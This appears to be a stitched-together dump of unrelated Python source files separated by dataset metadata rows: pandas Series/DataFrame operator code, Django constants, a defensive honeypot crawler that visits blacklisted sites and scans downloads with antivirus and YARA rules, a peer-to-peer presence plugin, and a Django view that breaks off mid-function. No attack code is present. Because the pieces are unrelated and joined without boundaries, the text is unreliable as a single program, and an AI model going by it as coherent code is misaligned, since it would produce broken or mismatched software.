_construct_result(left, result[0], index=index, name=name, dtype=dtype),
_construct_result(left, result[1], index=index, name=name, dtype=dtype),
)
def _arith_method_SERIES(cls, op, special):
"""
Wrapper function for Series arithmetic operations, to avoid
code duplication.
"""
str_rep = _get_opstr(op, cls)
op_name = _get_op_name(op, special)
eval_kwargs = _gen_eval_kwargs(op_name)
construct_result = (
_construct_divmod_result if op in [divmod, rdivmod] else _construct_result
)
def na_op(x, y):
"""
Return the result of evaluating op on the passed in values.
        If native types are not compatible, try coercion to object dtype.
Parameters
----------
x : array-like
y : array-like or scalar
Returns
-------
array-like
Raises
------
TypeError : invalid operation
"""
import pandas.core.computation.expressions as expressions
try:
result = expressions.evaluate(op, str_rep, x, y, **eval_kwargs)
except TypeError:
result = masked_arith_op(x, y, op)
return missing.dispatch_fill_zeros(op, x, y, result)
def wrapper(left, right):
if isinstance(right, ABCDataFrame):
return NotImplemented
left, right = _align_method_SERIES(left, right)
res_name = get_op_result_name(left, right)
right = maybe_upcast_for_op(right)
if is_categorical_dtype(left):
raise TypeError(
"{typ} cannot perform the operation "
"{op}".format(typ=type(left).__name__, op=str_rep)
)
elif is_datetime64_dtype(left) or is_datetime64tz_dtype(left):
# Give dispatch_to_index_op a chance for tests like
# test_dt64_series_add_intlike, which the index dispatching handles
# specifically.
result = dispatch_to_index_op(op, left, right, pd.DatetimeIndex)
return construct_result(
left, result, index=left.index, name=res_name, dtype=result.dtype
)
elif is_extension_array_dtype(left) or (
is_extension_array_dtype(right) and not is_scalar(right)
):
# GH#22378 disallow scalar to exclude e.g. "category", "Int64"
return dispatch_to_extension_op(op, left, right)
elif is_timedelta64_dtype(left):
result = dispatch_to_index_op(op, left, right, pd.TimedeltaIndex)
return construct_result(left, result, index=left.index, name=res_name)
elif is_timedelta64_dtype(right):
# We should only get here with non-scalar or timedelta64('NaT')
# values for right
# Note: we cannot use dispatch_to_index_op because
# that may incorrectly raise TypeError when we
# should get NullFrequencyError
orig_right = right
if is_scalar(right):
# broadcast and wrap in a TimedeltaIndex
assert np.isnat(right)
right = np.broadcast_to(right, left.shape)
right = pd.TimedeltaIndex(right)
assert isinstance(right, (pd.TimedeltaIndex, ABCTimedeltaArray, ABCSeries))
try:
result = op(left._values, right)
except NullFrequencyError:
if orig_right is not right:
# i.e. scalar timedelta64('NaT')
# We get a NullFrequencyError because we broadcast to
# TimedeltaIndex, but this should be TypeError.
raise TypeError(
"incompatible type for a datetime/timedelta "
"operation [{name}]".format(name=op.__name__)
)
raise
# We do not pass dtype to ensure that the Series constructor
# does inference in the case where `result` has object-dtype.
return construct_result(left, result, index=left.index, name=res_name)
elif isinstance(right, (ABCDatetimeArray, pd.DatetimeIndex)):
result = op(left._values, right)
return construct_result(left, result, index=left.index, name=res_name)
lvalues = left.values
rvalues = right
if isinstance(rvalues, (ABCSeries, ABCIndexClass)):
rvalues = rvalues._values
with np.errstate(all="ignore"):
result = na_op(lvalues, rvalues)
return construct_result(
left, result, index=left.index, name=res_name, dtype=None
)
wrapper.__name__ = op_name
return wrapper
def _comp_method_OBJECT_ARRAY(op, x, y):
if isinstance(y, list):
y = construct_1d_object_array_from_listlike(y)
if isinstance(y, (np.ndarray, ABCSeries, ABCIndex)):
if not is_object_dtype(y.dtype):
y = y.astype(np.object_)
if isinstance(y, (ABCSeries, ABCIndex)):
y = y.values
result = libops.vec_compare(x, y, op)
else:
result = libops.scalar_compare(x, y, op)
return result
def _comp_method_SERIES(cls, op, special):
"""
    Wrapper function for Series comparison operations, to avoid
code duplication.
"""
op_name = _get_op_name(op, special)
masker = _gen_eval_kwargs(op_name).get("masker", False)
def na_op(x, y):
# TODO:
        # should have guarantees on what x, y can be type-wise
# Extension Dtypes are not called here
# Checking that cases that were once handled here are no longer
# reachable.
assert not (is_categorical_dtype(y) and not is_scalar(y))
if is_object_dtype(x.dtype):
result = _comp_method_OBJECT_ARRAY(op, x, y)
elif is_datetimelike_v_numeric(x, y):
return invalid_comparison(x, y, op)
else:
# we want to compare like types
# we only want to convert to integer like if
# we are not NotImplemented, otherwise
# we would allow datetime64 (but viewed as i8) against
# integer comparisons
# we have a datetime/timedelta and may need to convert
assert not needs_i8_conversion(x)
mask = None
if not is_scalar(y) and needs_i8_conversion(y):
mask = isna(x) | isna(y)
y = y.view("i8")
x = x.view("i8")
method = getattr(x, op_name, None)
if method is not None:
with np.errstate(all="ignore"):
result = method(y)
if result is NotImplemented:
return invalid_comparison(x, y, op)
else:
result = op(x, y)
if mask is not None and mask.any():
result[mask] = masker
return result
def wrapper(self, other, axis=None):
# Validate the axis parameter
if axis is not None:
self._get_axis_number(axis)
res_name = get_op_result_name(self, other)
if isinstance(other, list):
# TODO: same for tuples?
other = np.asarray(other)
if isinstance(other, ABCDataFrame): # pragma: no cover
# Defer to DataFrame implementation; fail early
return NotImplemented
elif isinstance(other, ABCSeries) and not self._indexed_same(other):
raise ValueError("Can only compare identically-labeled " "Series objects")
elif is_categorical_dtype(self):
# Dispatch to Categorical implementation; pd.CategoricalIndex
# behavior is non-canonical GH#19513
res_values = dispatch_to_index_op(op, self, other, pd.Categorical)
return self._constructor(res_values, index=self.index, name=res_name)
elif is_datetime64_dtype(self) or is_datetime64tz_dtype(self):
# Dispatch to DatetimeIndex to ensure identical
# Series/Index behavior
if isinstance(other, datetime.date) and not isinstance(
other, datetime.datetime
):
# https://github.com/pandas-dev/pandas/issues/21152
# Compatibility for difference between Series comparison w/
# datetime and date
msg = (
"Comparing Series of datetimes with 'datetime.date'. "
"Currently, the 'datetime.date' is coerced to a "
"datetime. In the future pandas will not coerce, "
"and {future}. "
"To retain the current behavior, "
"convert the 'datetime.date' to a datetime with "
"'pd.Timestamp'."
)
if op in {operator.lt, operator.le, operator.gt, operator.ge}:
future = "a TypeError will be raised"
else:
future = (
"'the values will not compare equal to the " "'datetime.date'"
)
msg = "\n".join(textwrap.wrap(msg.format(future=future)))
warnings.warn(msg, FutureWarning, stacklevel=2)
other = Timestamp(other)
res_values = dispatch_to_index_op(op, self, other, pd.DatetimeIndex)
return self._constructor(res_values, index=self.index, name=res_name)
elif is_timedelta64_dtype(self):
res_values = dispatch_to_index_op(op, self, other, pd.TimedeltaIndex)
return self._constructor(res_values, index=self.index, name=res_name)
elif is_extension_array_dtype(self) or (
is_extension_array_dtype(other) and not is_scalar(other)
):
# Note: the `not is_scalar(other)` condition rules out
# e.g. other == "category"
return dispatch_to_extension_op(op, self, other)
elif isinstance(other, ABCSeries):
# By this point we have checked that self._indexed_same(other)
res_values = na_op(self.values, other.values)
# rename is needed in case res_name is None and res_values.name
# is not.
return self._constructor(
res_values, index=self.index, name=res_name
).rename(res_name)
elif isinstance(other, (np.ndarray, ABCIndexClass)):
# do not check length of zerodim array
# as it will broadcast
if other.ndim != 0 and len(self) != len(other):
raise ValueError("Lengths must match to compare")
res_values = na_op(self.values, np.asarray(other))
result = self._constructor(res_values, index=self.index)
# rename is needed in case res_name is None and self.name
# is not.
return result.__finalize__(self).rename(res_name)
elif is_scalar(other) and isna(other):
# numpy does not like comparisons vs None
if op is operator.ne:
res_values = np.ones(len(self), dtype=bool)
else:
res_values = np.zeros(len(self), dtype=bool)
return self._constructor(
res_values, index=self.index, name=res_name, dtype="bool"
)
else:
values = self.to_numpy()
with np.errstate(all="ignore"):
res = na_op(values, other)
if is_scalar(res):
raise TypeError(
"Could not compare {typ} type with Series".format(typ=type(other))
)
# always return a full value series here
res_values = com.values_from_object(res)
return self._constructor(
res_values, index=self.index, name=res_name, dtype="bool"
)
wrapper.__name__ = op_name
return wrapper
def _bool_method_SERIES(cls, op, special):
"""
    Wrapper function for Series boolean operations, to avoid
code duplication.
"""
op_name = _get_op_name(op, special)
def na_op(x, y):
try:
result = op(x, y)
except TypeError:
assert not isinstance(y, (list, ABCSeries, ABCIndexClass))
if isinstance(y, np.ndarray):
# bool-bool dtype operations should be OK, should not get here
assert not (is_bool_dtype(x) and is_bool_dtype(y))
x = ensure_object(x)
y = ensure_object(y)
result = libops.vec_binop(x, y, op)
else:
# let null fall thru
assert lib.is_scalar(y)
if not isna(y):
y = bool(y)
try:
result = libops.scalar_binop(x, y, op)
except (
TypeError,
ValueError,
AttributeError,
OverflowError,
NotImplementedError,
):
raise TypeError(
"cannot compare a dtyped [{dtype}] array "
"with a scalar of type [{typ}]".format(
dtype=x.dtype, typ=type(y).__name__
)
)
return result
fill_int = lambda x: x.fillna(0)
fill_bool = lambda x: x.fillna(False).astype(bool)
def wrapper(self, other):
is_self_int_dtype = is_integer_dtype(self.dtype)
self, other = _align_method_SERIES(self, other, align_asobject=True)
res_name = get_op_result_name(self, other)
if isinstance(other, ABCDataFrame):
# Defer to DataFrame implementation; fail early
return NotImplemented
elif isinstance(other, (ABCSeries, ABCIndexClass)):
is_other_int_dtype = is_integer_dtype(other.dtype)
other = fill_int(other) if is_other_int_dtype else fill_bool(other)
ovalues = other.values
finalizer = lambda x: x
else:
# scalars, list, tuple, np.array
is_other_int_dtype = is_integer_dtype(np.asarray(other))
if is_list_like(other) and not isinstance(other, np.ndarray):
# TODO: Can we do this before the is_integer_dtype check?
# could the is_integer_dtype check be checking the wrong
# thing? e.g. other = [[0, 1], [2, 3], [4, 5]]?
other = construct_1d_object_array_from_listlike(other)
ovalues = other
finalizer = lambda x: x.__finalize__(self)
# For int vs int `^`, `|`, `&` are bitwise operators and return
# integer dtypes. Otherwise these are boolean ops
filler = fill_int if is_self_int_dtype and is_other_int_dtype else fill_bool
res_values = na_op(self.values, ovalues)
unfilled = self._constructor(res_values, index=self.index, name=res_name)
filled = filler(unfilled)
return finalizer(filled)
wrapper.__name__ = op_name
return wrapper
def _flex_method_SERIES(cls, op, special):
name = _get_op_name(op, special)
doc = _make_flex_doc(name, "series")
@Appender(doc)
def flex_wrapper(self, other, level=None, fill_value=None, axis=0):
# validate axis
if axis is not None:
self._get_axis_number(axis)
if isinstance(other, ABCSeries):
return self._binop(other, op, level=level, fill_value=fill_value)
elif isinstance(other, (np.ndarray, list, tuple)):
if len(other) != len(self):
raise ValueError("Lengths must be equal")
other = self._constructor(other, self.index)
return self._binop(other, op, level=level, fill_value=fill_value)
else:
if fill_value is not None:
self = self.fillna(fill_value)
return self._constructor(op(self, other), self.index).__finalize__(self)
flex_wrapper.__name__ = name
return flex_wrapper
# -----------------------------------------------------------------------------
# DataFrame
def _combine_series_frame(self, other, func, fill_value=None, axis=None, level=None):
"""
Apply binary operator `func` to self, other using alignment and fill
conventions determined by the fill_value, axis, and level kwargs.
Parameters
----------
self : DataFrame
other : Series
func : binary operator
fill_value : object, default None
axis : {0, 1, 'columns', 'index', None}, default None
level : int or None, default None
Returns
-------
result : DataFrame
"""
if fill_value is not None:
raise NotImplementedError(
"fill_value {fill} not supported.".format(fill=fill_value)
)
if axis is not None:
axis = self._get_axis_number(axis)
if axis == 0:
return self._combine_match_index(other, func, level=level)
else:
return self._combine_match_columns(other, func, level=level)
else:
if not len(other):
return self * np.nan
if not len(self):
            # Ambiguous case; use _series so this works with DataFrame
return self._constructor(
data=self._series, index=self.index, columns=self.columns
)
# default axis is columns
return self._combine_match_columns(other, func, level=level)
def _align_method_FRAME(left, right, axis):
""" convert rhs to meet lhs dims if input is list, tuple or np.ndarray """
def to_series(right):
msg = (
"Unable to coerce to Series, length must be {req_len}: " "given {given_len}"
)
if axis is not None and left._get_axis_name(axis) == "index":
if len(left.index) != len(right):
raise ValueError(
msg.format(req_len=len(left.index), given_len=len(right))
)
right = left._constructor_sliced(right, index=left.index)
else:
if len(left.columns) != len(right):
raise ValueError(
msg.format(req_len=len(left.columns), given_len=len(right))
)
right = left._constructor_sliced(right, index=left.columns)
return right
if isinstance(right, np.ndarray):
if right.ndim == 1:
right = to_series(right)
elif right.ndim == 2:
if right.shape == left.shape:
right = left._constructor(right, index=left.index, columns=left.columns)
elif right.shape[0] == left.shape[0] and right.shape[1] == 1:
# Broadcast across columns
right = np.broadcast_to(right, left.shape)
right = left._constructor(right, index=left.index, columns=left.columns)
elif right.shape[1] == left.shape[1] and right.shape[0] == 1:
# Broadcast along rows
right = to_series(right[0, :])
else:
raise ValueError(
"Unable to coerce to DataFrame, shape "
"must be {req_shape}: given {given_shape}".format(
req_shape=left.shape, given_shape=right.shape
)
)
elif right.ndim > 2:
raise ValueError(
"Unable to coerce to Series/DataFrame, dim "
"must be <= 2: {dim}".format(dim=right.shape)
)
elif is_list_like(right) and not isinstance(right, (ABCSeries, ABCDataFrame)):
# GH17901
right = to_series(right)
return right
def _arith_method_FRAME(cls, op, special):
str_rep = _get_opstr(op, cls)
op_name = _get_op_name(op, special)
eval_kwargs = _gen_eval_kwargs(op_name)
default_axis = _get_frame_op_default_axis(op_name)
def na_op(x, y):
import pandas.core.computation.expressions as expressions
try:
result = expressions.evaluate(op, str_rep, x, y, **eval_kwargs)
except TypeError:
result = masked_arith_op(x, y, op)
return missing.dispatch_fill_zeros(op, x, y, result)
if op_name in _op_descriptions:
# i.e. include "add" but not "__add__"
doc = _make_flex_doc(op_name, "dataframe")
else:
doc = _arith_doc_FRAME % op_name
@Appender(doc)
def f(self, other, axis=default_axis, level=None, fill_value=None):
other = _align_method_FRAME(self, other, axis)
if isinstance(other, ABCDataFrame):
# Another DataFrame
pass_op = op if should_series_dispatch(self, other, op) else na_op
return self._combine_frame(other, pass_op, fill_value, level)
elif isinstance(other, ABCSeries):
# For these values of `axis`, we end up dispatching to Series op,
# so do not want the masked op.
pass_op = op if axis in [0, "columns", None] else na_op
return _combine_series_frame(
self, other, pass_op, fill_value=fill_value, axis=axis, level=level
)
else:
if fill_value is not None:
self = self.fillna(fill_value)
assert np.ndim(other) == 0
return self._combine_const(other, op)
f.__name__ = op_name
return f
def _flex_comp_method_FRAME(cls, op, special):
str_rep = _get_opstr(op, cls)
op_name = _get_op_name(op, special)
default_axis = _get_frame_op_default_axis(op_name)
def na_op(x, y):
try:
with np.errstate(invalid="ignore"):
result = op(x, y)
except TypeError:
result = mask_cmp_op(x, y, op)
return result
doc = _flex_comp_doc_FRAME.format(
op_name=op_name, desc=_op_descriptions[op_name]["desc"]
)
@Appender(doc)
def f(self, other, axis=default_axis, level=None):
other = _align_method_FRAME(self, other, axis)
if isinstance(other, ABCDataFrame):
# Another DataFrame
if not self._indexed_same(other):
self, other = self.align(other, "outer", level=level, copy=False)
return dispatch_to_series(self, other, na_op, str_rep)
elif isinstance(other, ABCSeries):
return _combine_series_frame(
self, other, na_op, fill_value=None, axis=axis, level=level
)
else:
assert np.ndim(other) == 0, other
return self._combine_const(other, na_op)
f.__name__ = op_name
return f
def _comp_method_FRAME(cls, func, special):
str_rep = _get_opstr(func, cls)
op_name = _get_op_name(func, special)
@Appender("Wrapper for comparison method {name}".format(name=op_name))
def f(self, other):
other = _align_method_FRAME(self, other, axis=None)
if isinstance(other, ABCDataFrame):
# Another DataFrame
if not self._indexed_same(other):
raise ValueError(
"Can only compare identically-labeled " "DataFrame objects"
)
return dispatch_to_series(self, other, func, str_rep)
elif isinstance(other, ABCSeries):
return _combine_series_frame(
self, other, func, fill_value=None, axis=None, level=None
)
else:
# straight boolean comparisons we want to allow all columns
# (regardless of dtype to pass thru) See #4537 for discussion.
res = self._combine_const(other, func)
return res.fillna(True).astype(bool)
f.__name__ = op_name
return f
# -----------------------------------------------------------------------------
# Sparse
def _cast_sparse_series_op(left, right, opname):
"""
For SparseSeries operation, coerce to float64 if the result is expected
to have NaN or inf values
Parameters
----------
left : SparseArray
right : SparseArray
opname : str
Returns
-------
left : SparseArray
right : SparseArray
"""
from pandas.core.sparse.api import SparseDtype
opname = opname.strip("_")
# TODO: This should be moved to the array?
if is_integer_dtype(left) and is_integer_dtype(right):
# series coerces to float64 if result should have NaN/inf
if opname in ("floordiv", "mod") and (right.to_dense() == 0).any():
left = left.astype(SparseDtype(np.float64, left.fill_value))
right = right.astype(SparseDtype(np.float64, right.fill_value))
elif opname in ("rfloordiv", "rmod") and (left.to_dense() == 0).any():
left = left.astype(SparseDtype(np.float64, left.fill_value))
right = right.astype(SparseDtype(np.float64, right.fill_value))
return left, right
def _arith_method_SPARSE_SERIES(cls, op, special):
"""
Wrapper function for Series arithmetic operations, to avoid
code duplication.
"""
op_name = _get_op_name(op, special)
def wrapper(self, other):
if isinstance(other, ABCDataFrame):
return NotImplemented
elif isinstance(other, ABCSeries):
if not isinstance(other, ABCSparseSeries):
other = other.to_sparse(fill_value=self.fill_value)
return _sparse_series_op(self, other, op, op_name)
elif is_scalar(other):
with np.errstate(all="ignore"):
new_values = op(self.values, other)
return self._constructor(new_values, index=self.index, name=self.name)
else: # pragma: no cover
raise TypeError(
"operation with {other} not supported".format(other=type(other))
)
wrapper.__name__ = op_name
return wrapper
def _sparse_series_op(left, right, op, name):
left, right = left.align(right, join="outer", copy=False)
new_index = left.index
new_name = get_op_result_name(left, right)
from pandas.core.arrays.sparse import _sparse_array_op
lvalues, rvalues = _cast_sparse_series_op(left.values, right.values, name)
result = _sparse_array_op(lvalues, rvalues, op, name)
return left._constructor(result, index=new_index, name=new_name)
def maybe_dispatch_ufunc_to_dunder_op(
self: ArrayLike, ufunc: Callable, method: str, *inputs: ArrayLike, **kwargs: Any
):
"""
Dispatch a ufunc to the equivalent dunder method.
Parameters
----------
self : ArrayLike
The array whose dunder method we dispatch to
ufunc : Callable
A NumPy ufunc
method : {'reduce', 'accumulate', 'reduceat', 'outer', 'at', '__call__'}
inputs : ArrayLike
The input arrays.
kwargs : Any
The additional keyword arguments, e.g. ``out``.
Returns
-------
result : Any
The result of applying the ufunc
"""
# special has the ufuncs we dispatch to the dunder op on
special = {
"add",
"sub",
"mul",
"pow",
"mod",
"floordiv",
"truediv",
"divmod",
"eq",
"ne",
"lt",
"gt",
"le",
"ge",
"remainder",
"matmul",
}
aliases = {
"subtract": "sub",
"multiply": "mul",
"floor_divide": "floordiv",
"true_divide": "truediv",
"power": "pow",
"remainder": "mod",
"divide": "div",
"equal": "eq",
"not_equal": "ne",
"less": "lt",
"less_equal": "le",
"greater": "gt",
"greater_equal": "ge",
}
# For op(., Array) -> Array.__r{op}__
flipped = {
"lt": "__gt__",
"le": "__ge__",
"gt": "__lt__",
"ge": "__le__",
"eq": "__eq__",
"ne": "__ne__",
}
op_name = ufunc.__name__
op_name = aliases.get(op_name, op_name)
def not_implemented(*args, **kwargs):
return NotImplemented
if method == "__call__" and op_name in special and kwargs.get("out") is None:
if isinstance(inputs[0], type(self)):
name = "__{}__".format(op_name)
return getattr(self, name, not_implemented)(inputs[1])
else:
name = flipped.get(op_name, "__r{}__".format(op_name))
return getattr(self, name, not_implemented)(inputs[0])
else:
return NotImplemented
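# Usage sketch (the pattern pandas' own extension arrays follow; the body
# below is illustrative): __array_ufunc__ tries the dunder dispatch first and
# only then falls back to real ufunc handling:
#   def __array_ufunc__(self, ufunc, method, *inputs, **kwargs):
#       result = maybe_dispatch_ufunc_to_dunder_op(
#           self, ufunc, method, *inputs, **kwargs)
#       if result is not NotImplemented:
#           return result
#       ...  # element-wise fallback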
|
apache-2.0
| 6,046,639,829,361,250,000
| 30.796562
| 88
| 0.572749
| false
| 3.972578
| false
| false
| false
|
debalance/hp
|
hp/core/constants.py
|
1
|
1561
|
# -*- coding: utf-8 -*-
#
# This file is part of the jabber.at homepage (https://github.com/jabber-at/hp).
#
# This project is free software: you can redistribute it and/or modify it under the terms of the
# GNU General Public License as published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This project is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
# even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with django-xmpp-account.
# If not, see <http://www.gnu.org/licenses/>.
from django.utils.translation import ugettext_lazy as _
REGISTRATION_WEBSITE = 0
REGISTRATION_INBAND = 1
REGISTRATION_MANUAL = 2
REGISTRATION_UNKNOWN = 9
REGISTRATION_CHOICES = (
(REGISTRATION_WEBSITE, _('Via Website')),
(REGISTRATION_INBAND, _('In-Band Registration')),
(REGISTRATION_MANUAL, _('Manually')),
(REGISTRATION_UNKNOWN, _('Unknown')),
)
TARGET_URL = 0
TARGET_NAMED_URL = 1
TARGET_MODEL = 2
TARGET_CHOICES = {
TARGET_URL: _('URL'),
TARGET_NAMED_URL: _('URL Name'),
TARGET_MODEL: _('Model'),
}
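# Illustrative usage (not in this file): the pairs above plug straight into a
# Django model field, e.g.
#   registered = models.SmallIntegerField(
#       choices=REGISTRATION_CHOICES, default=REGISTRATION_UNKNOWN)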
# Logged user activities
ACTIVITY_REGISTER = 0
ACTIVITY_RESET_PASSWORD = 1
ACTIVITY_SET_PASSWORD = 2
ACTIVITY_SET_EMAIL = 3
ACTIVITY_FAILED_LOGIN = 4
ACTIVITY_CONTACT = 5 # used for ratelimiting
ACTIVITY_RESEND_CONFIRMATION = 6 # When the user wants to resend the confirmation
|
gpl-3.0
| -4,503,386,072,711,604,000
| 32.934783
| 99
| 0.728379
| false
| 3.572082
| false
| false
| false
|
Masood-M/yalih
|
honeypot.py
|
1
|
6809
|
#! /usr/bin/env python
import time
import threading
import os, sys, Queue
from time import gmtime, strftime
from itertools import groupby
from operator import itemgetter
import os.path
import imapfile
import logging
import honeypotconfig
import scan
import bing
import executemechanize
import malwebsites
import normalize
import updateantivirus
import yaradetection
import unquote
import argparse
import extraction
try:
import signal
from signal import SIGPIPE, SIG_IGN
signal.signal(signal.SIGPIPE, signal.SIG_IGN)
except ImportError:
pass
queue=Queue.Queue()
logger = logging.getLogger()
def worker():
urldict = queue.get()
#this is for the normal visitor output (no error)
logger.info(str(urldict["counter"]) + ",\t" + urldict["url"]+",\t"+ "Visiting")
executemechanize.executemechanize(urldict)
queue.task_done()
def threadmaker():
while True:
threadstomake = honeypotconfig.threadnum - threading.active_count()
for i in range(threadstomake):
thread = threading.Thread(target=worker)
thread.setDaemon(True)
thread.start()
time.sleep(5)
def readurl():
url = sys.argv[2]
return url
def main():
#Create the threads
thread = threading.Thread(target=threadmaker)
thread.setDaemon(True)
thread.start()
script_path = os.path.dirname(os.path.abspath( __file__ ))
parser = argparse.ArgumentParser(description="Examples:\n./honeypot.py --url www.yahoo.com\n./honeypot.py --file <file path>\n./honeypot.py --blacklist\n./honeypot.py --email\n./honeypot.py --update\n./honeypot.py --search <warez>\n./honeypot.py --local <file/directory path>", formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument("--email", help="Retrieves your Spam emails from your mail server and crawls the extracted URLS. Enter your email credentials in honeypotconfig.py file!", action="store_true")
parser.add_argument("--update", help="Updates the anti-virus signatures", action="store_true")
parser.add_argument("--blacklist", help="Downloads list of suspicious malicious websites from three databases and retrieves/scans them accordingly", action="store_true")
parser.add_argument("--file", nargs=1, help="Provide an input file", action="store")
parser.add_argument("--url", nargs=1, help="Provide a url", action="store")
parser.add_argument("--search", nargs=1, help="searches Bing search engine for a keyword (1 single keyword at the moment) and returns 100 results starting from the 20th result.", action="store")
parser.add_argument("--local", nargs=1, help="scans a local file or directory for malicious signatures.", action="store")
parser.add_argument("--debug", help="Include http header", action="store_true")
parser.add_argument("--crawler", help="Crawl the sites and save any executables found", action="store_true")
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
path = script_path+"/tmp"
print path
#create the tmp folder
if not os.path.isdir(path):
os.makedirs("tmp")
#Crawler
if args.crawler:
executemechanize.crawler = True
#Logging
"""Initialize logger."""
command = "mkdir -p debug/" #create a debug/ folder in the working directory
os.system(command)
sys.stdin=open("debug/" + time.asctime(time.localtime(time.time())) +".log", "a")
logger = logging.getLogger()
sh = logging.StreamHandler()
sh.setFormatter(SpecialFormatter())
sh2 = logging.StreamHandler(sys.stdin)
sh2.setFormatter(SpecialFormatter())
logger.addHandler(sh)
logger.addHandler(sh2)
logger.setLevel(logging.INFO)
if args.debug:
logger.setLevel(logging.DEBUG)
executemechanize.set_logging_level(logging.DEBUG)
#Update antivirus signatures
if args.update:
updateantivirus.updateantivirus()
#Blacklist Databases
if args.blacklist:
try:
if not os.path.exists("list"):
os.mkdir("list")
except OSError as e:
logger.error(e)
malwebsites.domaindownload()
malwebsites.duplicateremover()
urls = open("list/malwebsites.txt", "r")
counter = 0
for line in urls:
dict={}
counter += 1
dict["url"] = line.strip()
dict["counter"] = counter
queue.put(dict)
queue.join()
scan.scanning(path)
yaradetection.listandscan(path)
unquote.unquoteDirectory(path)
#Email
if args.email:
imapfile.imap()
extraction.extracturl()#extracts urls from emails.txt file
extraction.duplicateremover() #removes the duplicate urls from crawler.txt files (which now contain extracted urls from emails.txt)
os.remove("emails.txt")
urls = open('crawler.txt', "r")
counter = 0
for line in urls:
dict={}
counter += 1
dict["url"] = line.rstrip()
dict["counter"] = counter
queue.put(dict)
queue.join()
scan.scanning(path)
yaradetection.listandscan(path)
unquote.unquoteDirectory(path)
#File
if args.file:
mylist = list()
mylist2 = list()
counter =0
fopen3 = open(sys.argv[2],"r")
for line in fopen3:
dict={}
line = line.strip()
counter += 1
if not (line.startswith("http://")) and not (line.startswith("https://")):
line = "http://"+line
dict["url"] = line
dict["counter"] = counter
queue.put(dict)
queue.join()
fopen3.close()
scan.scanning(path)
yaradetection.listandscan(path)
unquote.unquoteDirectory(path)
#URL
if args.url:
url = readurl()
url = normalize.normalizeurl(url)
dict={}
counter = 1
if not (url.startswith("http://")) and not (url.startswith("https://")):
url = "http://"+url
dict["url"] = url
dict["counter"] = counter
queue.put(dict)
queue.join()
# executemechanize.executemechanize(url)
scan.scanning(path)
yaradetection.listandscan(path)
unquote.unquoteDirectory(path)
#Search
if args.search:
keyword = sys.argv[2]
bing.searchBing(keyword)
mylist = list()
fopen = open("list/searchresult.txt","r")
for line in fopen:
line = line.strip()
if not line:
continue
mylist.append(line)
fopen.close()
counter = 0
for line in mylist:
dict={}
counter += 1
dict["url"] = line
dict["counter"] = counter
queue.put(dict)
queue.join()
scan.scanning(path)
yaradetection.listandscan(path)
unquote.unquoteDirectory(path)
#Local Scan
if args.local:
path = sys.argv[2]
scan.scanning(path)
yaradetection.listandscan(path)
unquote.unquoteDirectory(path)
class SpecialFormatter(logging.Formatter):
FORMATS = {logging.INFO : "%(name)s,\t%(levelname)s,\t%(message)s", 'DEFAULT' : "%(name)s,\t%(levelname)s,\t%(message)s"}
def formatTime(self, record, datefmt=None):
self._datefmt = time.strftime("%Y-%m-%d %H:%M:%S")
return logging.Formatter.formatTime(self, record, self._datefmt)
def format(self, record):
self._fmt = self.FORMATS.get(record.levelno, self.FORMATS['DEFAULT'])
return logging.Formatter.format(self, record)
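# Illustrative output (hypothetical URL): a worker visit logged through this
# formatter renders as the tab-separated line
#   root,  INFO,  1,  http://example.com,  Visiting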
if __name__ == "__main__":
main()
|
apache-2.0
| 7,934,120,239,446,023,000
| 25.597656
| 322
| 0.708474
| false
| 3.095
| false
| false
| false
|
proximate/proximate
|
userpresence.py
|
1
|
1863
|
#
# Proximate - Peer-to-peer social networking
#
# Copyright (c) 2008-2011 Nokia Corporation
#
# All rights reserved.
#
# This software is licensed under The Clear BSD license.
# See the LICENSE file for more details.
#
from plugins import Plugin, get_plugin_by_type
from proximateprotocol import PLUGIN_TYPE_COMMUNITY, PLUGIN_TYPE_NOTIFICATION, PLUGIN_TYPE_USER_PRESENCE
from userpresence_gui import User_Presence_GUI
community = None
notify = None
class Pattern:
def __init__(self, dict):
self.dict = dict
def match(self, user):
for (key, value) in self.dict.iteritems():
if user.get(key).find(value) < 0:
return False
return True
def __str__(self):
return str(self.dict)
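# Illustrative match (sketch): a Pattern holds substring requirements keyed
# by user field, e.g.
#   p = Pattern({'nick': 'ali'})
#   p.match(user)    # True only if user.get('nick') contains 'ali'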
class User_Presence_Plugin(Plugin):
def __init__(self):
global community, notify
self.register_plugin(PLUGIN_TYPE_USER_PRESENCE)
community = get_plugin_by_type(PLUGIN_TYPE_COMMUNITY)
notify = get_plugin_by_type(PLUGIN_TYPE_NOTIFICATION)
self.patterns = []
def user_appears(self, user):
nick = user.get('nick')
for p in self.patterns:
if p.match(user):
notify.notify_with_response('User %s appeared' % nick, self.response_handler, None)
def user_changes(self, user, what=None):
nick = user.get('nick')
for p in self.patterns:
if p.match(user):
notify.notify_with_response('User %s changed' % nick, self.response_handler, None)
def response_handler(self, response, msg, ctx):
return False
def add_pattern(self, pdict):
p = Pattern(pdict)
self.patterns.append(p)
def delete_pattern(self, pattern):
self.patterns.remove(pattern)
def get_patterns(self):
return self.patterns
def init(options):
if options.presence:
User_Presence_Plugin()
|
bsd-3-clause
| 5,973,490,620,666,871,000
| 27.227273
| 104
| 0.640902
| false
| 3.631579
| false
| false
| false
|
desarrollosimagos/svidb
|
administrativo/actores/bancoaudio.py
|
1
|
5678
|
# -*- coding: utf8
from gestion.models import *
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.shortcuts import render_to_response, get_object_or_404
from django.template import RequestContext, loader
from actores.models import *
from areas.models import *
from especies.models import *
from plantillas.models import *
from menu.models import *
from perfil.models import PerfilPublico,ModulosPublicos,PerfilModulos
from django.db.models import Q
from forms import *
from inicio.models import Tipocolaboracion
from mapas.models import Colaboradorespersonas,contriBiblioteca,contriAudio,contriAvistamiento
def index(request):
_username = request.user.username
id_usuario = User.objects.get(username=_username)
id_persona = get_object_or_404(PerfilPublico, user=id_usuario.id)
persona = get_object_or_404(Directorios, pk=id_persona.persona.id)
return render_to_response('actores/bancoaudio/index.html', {'persona':persona})
def lista(request):
_username = request.user.username
id_usuario = User.objects.get(username=_username)
id_persona = get_object_or_404(PerfilPublico, user=id_usuario.id)
persona = get_object_or_404(Directorios, pk=id_persona.persona.id)
try:
biblioteca = Bancoaudiovisuals.objects.filter(directorio=persona).order_by('fecha')
